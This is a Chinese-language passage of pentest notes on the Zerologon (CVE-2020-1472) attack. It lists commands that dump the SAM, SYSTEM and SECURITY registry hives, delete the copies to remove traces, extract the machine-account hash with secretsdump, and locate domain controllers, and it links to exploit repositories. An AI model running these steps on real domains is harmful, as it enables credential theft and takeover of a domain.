这里因为之前通过NetLogon将账号hash置为空,后续获得域管hash后需要赶紧将之前在SAM文件保存的hash去恢复,否则会脱域。
导出SAM保存 sam.save 、security.save 、 system.save
reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save # 获取文件路径 get system.saveget sam.save get security.save # 删除文件 del /f system.save del /f sam.save del /f security.save 获取原来的NTLM Hash python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL通过拿到 $MACHINE.ACC: 的值,然后进行恢复:注意只有后半部分:
如何寻找域控计算机名?
# 不在域内 nbtscan扫描 nmap smb嗅探 nslookup <域控ip> 有时dns服务器也搭在域控上 # 在域内 命令查询 参考文章https://cloud.tencent.com/developer/article/1780108
https://github.com/VoidSec/CVE-2020-1472
https://github.com/bb00/zer0dump
https://blog.zsec.uk/zerologon-attacking-defending/
https://cloud.tencent.com/developer/article/1753595